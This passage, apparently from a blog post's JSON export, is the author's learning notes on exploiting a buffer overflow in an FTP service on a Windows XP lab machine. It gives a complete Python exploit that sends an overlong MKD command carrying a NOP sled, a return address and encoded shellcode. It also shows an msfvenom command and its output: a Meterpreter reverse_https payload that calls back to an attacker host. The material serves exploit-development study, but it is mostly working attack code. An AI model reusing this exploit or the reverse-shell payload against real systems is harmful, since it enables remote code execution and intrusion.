class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">buffer = &quot;\\x90&quot; * 30 + shellcode<br \/>\nevil = &quot;A&quot;*247 + &quot;\\x7D\\x16\\x9C\\x7C&quot; + buffer + &quot;C&quot;*(749-len(buffer))<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><i>Note: before the shellcode here we have inserted a nop sled (the 30 \\x90s), what this basically does is tell the insturction there is No Operation Performed here and to move to the next line in order to pad the payload out a bit.<\/i><\/p>\n<p>This leaves us with the resultant exploit code:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/><\/div><\/td><td><div class=\"python codecolorer\"><span class=\"co1\">#!\/usr\/bin\/python<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">socket<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">sys<\/span><br \/>\n<span class=\"co1\">#evil = &quot;A&quot;*247 + &quot;B&quot;*4 + &quot;C&quot;*749<\/span><br \/>\n<span class=\"co1\">#evil = &quot;A&quot;*247 + &quot;\\x7D\\x16\\x9C\\x7C&quot; + &quot;C&quot;*749<\/span><br \/>\nshellcode <span class=\"sy0\">=<\/span> <span class=\"br0\">&#40;<\/span><span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>bf<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>19<span class=\"es0\">\\x<\/span>02<span class=\"es0\">\\x<\/span>91<span class=\"es0\">\\x<\/span>d9<span class=\"es0\">\\x<\/span>ea<span class=\"es0\">\\x<\/span>d9<span class=\"es0\">\\x<\/span>74<span class=\"es0\">\\x<\/span>24<span class=\"es0\">\\x<\/span>f4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>c9<span class=\"es0\">\\x<\/span>b1&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>33<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>12<span class=\"es0\">\\x<\/span>03<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>12<span class=\"es0\">\\x<\/span>83<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>1d<span class=\"es0\">\\x<\/span>e0<span class=\"es0\">\\x<\/span>64<span class=\"es0\">\\x<\/span>6f<span class=\"es0\">\\x<\/span>f6<span class=\"es0\">\\x<\/span>6d&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>86<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>07<span class=\"es0\">\\x<\/span>0e<span class=\"es0\">\\x<\/span>0e<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>36<span class=\"es0\">\\x<\/span>1c<span class=\"es0\">\\x<\/span>74<span class=\"es0\">\\x<\/span>ff<span class=\"es0\">\\x<\/span>6b<span class=\"es0\">\\x<\/span>90<span class=\"es0\">\\x<\/span>fe<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>87&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>5b<span class=\"es0\">\\x<\/span>52<span class=\"es0\">\\x<\/span>45<span class=\"es0\">\\x<\/span>13<span class=\"es0\">\\x<\/span>29<span class=\"es0\">\\x<\/span>7b<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>84<span class=\"es0\">\\x<\/span>5d<span class=\"es0\">\\x<\/span>45<span class=\"es0\">\\x<\/span>25<span class=\"es0\">\\x<\/span>29<span class=\"es0\">\\x<\/span>62<span class=\"es0\">\\x<\/span>09&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>e5<span class=\"es0\">\\x<\/span>2b<span class=\"es0\">\\x<\/span>1e<span class=\"es0\">\\x<\/span>53<span class=\"es0\">\\x<\/span>3a<span class=\"es0\">\\x<\/span>8c<span class=\"es0\">\\x<\/span>1f<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>58<span class=\"es0\">\\x<\/span>c0<span class=\"es0\">\\x<\/span>a0<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>31&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>13<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>35<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>af<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>99<span class=\"es0\">\\x<\/span>5a<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>49<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>64<span class=\"es0\">\\x<\/span>e0&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>cc<span class=\"es0\">\\x<\/span>d5<span class=\"es0\">\\x<\/span>7f<span class=\"es0\">\\x<\/span>d7<span class=\"es0\">\\x<\/span>f4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>27<span class=\"es0\">\\x<\/span>c8<span class=\"es0\">\\x<\/span>05<span class=\"es0\">\\x<\/span>b2<span class=\"es0\">\\x<\/span>3b<span class=\"es0\">\\x<\/span>34<span class=\"es0\">\\x<\/span>4c<span class=\"es0\">\\x<\/span>bf&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>88<span class=\"es0\">\\x<\/span>ce<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>69<span class=\"es0\">\\x<\/span>c1<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>55<span class=\"es0\">\\x<\/span>8e<span class=\"es0\">\\x<\/span>11<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>58<span class=\"es0\">\\x<\/span>ce<span class=\"es0\">\\x<\/span>56<span class=\"es0\">\\x<\/span>77&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>83<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>ac<span class=\"es0\">\\x<\/span>84<span class=\"es0\">\\x<\/span>3e<span class=\"es0\">\\x<\/span>be<span class=\"es0\">\\x<\/span>76<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>e4<span class=\"es0\">\\x<\/span>4b<span class=\"es0\">\\x<\/span>6b<span class=\"es0\">\\x<\/span>5f<span class=\"es0\">\\x<\/span>6e<span class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>4f&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>a3<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>1b<span class=\"es0\">\\x<\/span>6c<span class=\"es0\">\\x<\/span>08<span class=\"es0\">\\x<\/span>f8<span class=\"es0\">\\x<\/span>43<span class=\"es0\">\\x<\/span>70<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>2d<span class=\"es0\">\\x<\/span>f8<span class=\"es0\">\\x<\/span>8c<span class=\"es0\">\\x<\/span>04<span class=\"es0\">\\x<\/span>d0&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>05<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>4e<span class=\"es0\">\\x<\/span>04<span class=\"es0\">\\x<\/span>96<span class=\"es0\">\\x<\/span>aa<span class=\"es0\">\\x<\/span>2a<span class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>a7<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>92<span class=\"es0\">\\x<\/span>54&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>02<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>80<span class=\"es0\">\\x<\/span>34<span class=\"es0\">\\x<\/span>e4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>57<span class=\"es0\">\\x<\/span>b4<span class=\"es0\">\\x<\/span>92<span class=\"es0\">\\x<\/span>27<span class=\"es0\">\\x<\/span>57<span class=\"es0\">\\x<\/span>c6<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>07&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>17<span class=\"es0\">\\x<\/span>c8<span class=\"es0\">\\x<\/span>47<span class=\"es0\">\\x<\/span>08<span class=\"es0\">\\x<\/span>f2<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>b8<span class=\"es0\">\\x<\/span>42<span class=\"es0\">\\x<\/span>5f<span class=\"es0\">\\x<\/span>87<span class=\"es0\">\\x<\/span>50<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>35&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9a<span class=\"es0\">\\x<\/span>3c<span class=\"es0\">\\x<\/span>ac<span class=\"es0\">\\x<\/span>e3<span class=\"es0\">\\x<\/span>d8<span class=\"es0\">\\x<\/span>38<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>06<span class=\"es0\">\\x<\/span>a0<span class=\"es0\">\\x<\/span>be<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>63<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>fb<span class=\"es0\">\\x<\/span>f7&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>d7<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>9d<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>44<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>b7<span class=\"es0\">\\x<\/span>c3<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>06<span class=\"es0\">\\x<\/span>5b<span class=\"es0\">\\x<\/span>2a<span class=\"es0\">\\x<\/span>ae<span class=\"es0\">\\x<\/span>ae&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>fe<span class=\"es0\">\\x<\/span>32&quot;<\/span><span class=\"br0\">&#41;<\/span><br \/>\nbuffer <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>90&quot;<\/span> * <span class=\"nu0\">30<\/span> + shellcode<br \/>\nevil <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;A&quot;<\/span>*<span class=\"nu0\">247<\/span> + <span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>7D<span class=\"es0\">\\x<\/span>16<span class=\"es0\">\\x<\/span>9C<span class=\"es0\">\\x<\/span>7C&quot;<\/span> + buffer + <span class=\"st0\">&quot;C&quot;<\/span>*<span class=\"br0\">&#40;<\/span><span class=\"nu0\">749<\/span>-<span class=\"kw2\">len<\/span><span class=\"br0\">&#40;<\/span>buffer<span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">AF_INET<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">SOCK_STREAM<\/span><span class=\"br0\">&#41;<\/span><br \/>\nconnect<span class=\"sy0\">=<\/span>s.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.0.71'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'USER anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'PASS anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'MKD '<\/span> + evil + <span class=\"st0\">'<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'QUIT<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">close<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And here&#8217;s a demo video:<br \/>\n<iframe loading=\"lazy\" width=\"500\" height=\"375\" src=\"http:\/\/www.youtube.com\/embed\/zOtBoqPYTVg?feature=oembed\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>In order to take things further you could create shell code with a reverse https connection your attacking box:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/><\/div><\/td><td><div class=\"text codecolorer\">msf3$ .\/msfvenom -p windows\/meterpreter\/reverse_https LHOST=192.168.0.4 lPORT=4444 -b '\\x00\\x0A\\x0D' -f c <br \/>\n[*] x86\/shikata_ga_nai succeeded with size 394 (iteration=1)<br \/>\nunsigned char buf[] = <br \/>\n&quot;\\xdb\\xc1\\xb8\\x46\\x2c\\xc4\\x97\\xd9\\x74\\x24\\xf4\\x5a\\x2b\\xc9\\xb1&quot;<br \/>\n&quot;\\x5c\\x31\\x42\\x1a\\x03\\x42\\x1a\\x83\\xea\\xfc\\xe2\\xb3\\xd0\\x2c\\x1e&quot;<br \/>\n&quot;\\x3b\\x29\\xad\\x41\\xb2\\xcc\\x9c\\x53\\xa0\\x85\\x8d\\x63\\xa3\\xc8\\x3d&quot;<br \/>\n&quot;\\x0f\\xe1\\xf8\\xb6\\x7d\\x2d\\x0e\\x7e\\xcb\\x0b\\x21\\x7f\\xfd\\x93\\xed&quot;<br \/>\n&quot;\\x43\\x9f\\x6f\\xec\\x97\\x7f\\x4e\\x3f\\xea\\x7e\\x97\\x22\\x05\\xd2\\x40&quot;<br \/>\n&quot;\\x28\\xb4\\xc3\\xe5\\x6c\\x05\\xe5\\x29\\xfb\\x35\\x9d\\x4c\\x3c\\xc1\\x17&quot;<br \/>\n&quot;\\x4f\\x6d\\x7a\\x23\\x07\\x95\\xf0\\x6b\\xb7\\xa4\\xd5\\x6f\\x8b\\xef\\x52&quot;<br \/>\n&quot;\\x5b\\x78\\xee\\xb2\\x95\\x81\\xc0\\xfa\\x7a\\xbc\\xec\\xf6\\x83\\xf9\\xcb&quot;<br \/>\n&quot;\\xe8\\xf1\\xf1\\x2f\\x94\\x01\\xc2\\x52\\x42\\x87\\xd6\\xf5\\x01\\x3f\\x32&quot;<br \/>\n&quot;\\x07\\xc5\\xa6\\xb1\\x0b\\xa2\\xad\\x9d\\x0f\\x35\\x61\\x96\\x34\\xbe\\x84&quot;<br \/>\n&quot;\\x78\\xbd\\x84\\xa2\\x5c\\xe5\\x5f\\xca\\xc5\\x43\\x31\\xf3\\x15\\x2b\\xee&quot;<br \/>\n&quot;\\x51\\x5e\\xde\\xfb\\xe0\\x3d\\xb7\\x95\\x89\\xc9\\x47\\x02\\x25\\x58\\x26&quot;<br \/>\n&quot;\\xbb\\x9d\\xf2\\xfa\\x4c\\x38\\x05\\xfc\\x66\\x75\\xf6\\x55\\xde\\x21\\x5f&quot;<br \/>\n&quot;\\x30\\xe0\\x99\\x37\\xfe\\xb6\\x58\\x60\\x01\\xe3\\x70\\x31\\xa5\\x3d\\x4e&quot;<br \/>\n&quot;\\x9c\\x08\\x54\\x53\\x4f\\xfa\\xc0\\x0f\\x7e\\xfc\\x10\\xe3\\xd0\\x94\\x47&quot;<br \/>\n&quot;\\x8a\\x4f\\xa2\\x97\\x59\\x84\\x63\\x31\\x53\\x88\\x26\\xa9\\x93\\x1e\\x67&quot;<br \/>\n&quot;\\xad\\xc6\\x0c\\x35\\xff\\xb4\\xe0\\xd1\\x14\\x6d\\x2e\\x19\\x14\\x5b\\xa7&quot;<br \/>\n&quot;\\x9b\\x80\\x74\\xec\\x4b\\xd5\\x46\\x12\\x8c\\x5c\\x48\\x78\\x88\\x0e\\xe3&quot;<br \/>\n&quot;\\x63\\xc6\\xc6\\x86\\xdd\\x78\\x90\\x96\\x34\\xb5\\x62\\x3f\\xe1\\xe1\\xcb&quot;<br \/>\n&quot;\\x96\\x65\\x23\\xf2\\x0e\\x0e\\xc4\\x2f\\xab\\x30\\x4f\\xca\\xff\\xc4\\xa0&quot;<br \/>\n&quot;\\x01\\x2a\\xcf\\x88\\x3d\\x66\\xf0\\xf4\\x41\\xa6\\x37\\x72\\xf8\\xdd\\x47&quot;<br \/>\n&quot;\\x84\\x6c\\xee\\xf2\\x26\\x3a\\xf1\\x29\\x4c\\x83\\x65\\xd1\\x81\\x03\\x76&quot;<br \/>\n&quot;\\xb9\\xa1\\x03\\x36\\x39\\xf5\\x6b\\xee\\x9d\\xaa\\x8e\\xf1\\x08\\xdf\\x02&quot;<br \/>\n&quot;\\x5d\\x3b\\x07\\xf3\\x09\\x3b\\xe8\\xfc\\xc9\\x68\\xbe\\x94\\xdb\\x18\\xb7&quot;<br \/>\n&quot;\\x87\\x23\\xf1\\x4d\\x87\\xa8\\x34\\xc6\\x0f\\x50\\x05\\x5c\\xcf\\x27\\x6c&quot;<br \/>\n&quot;\\x07\\x13\\x2f\\x3f\\x47\\x6c\\x4f\\x8e\\x8e\\xa1\\x9e\\xc1\\xc6\\xfd\\xf0&quot;<br \/>\n&quot;\\x11\\x09\\xca\\x0c&quot;;<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So I&#8217;ve for a while needed to learn how to exploit a service using things like NOP sleds and so on. I decided to follow this great tutorial here but wanted to make my own notes. First off you&#8217;ll need the following: Windows XP x86 SP3 machine Immunity Debugger mona.py &#8211; place inside PyCommands folder [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":821,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[319,320,321,316,317,318,322,323],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=807"}],"version-history":[{"count":7,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807\/revisions"}],"predecessor-version":[{"id":860,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807\/revisions\/860"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/821"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=807"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}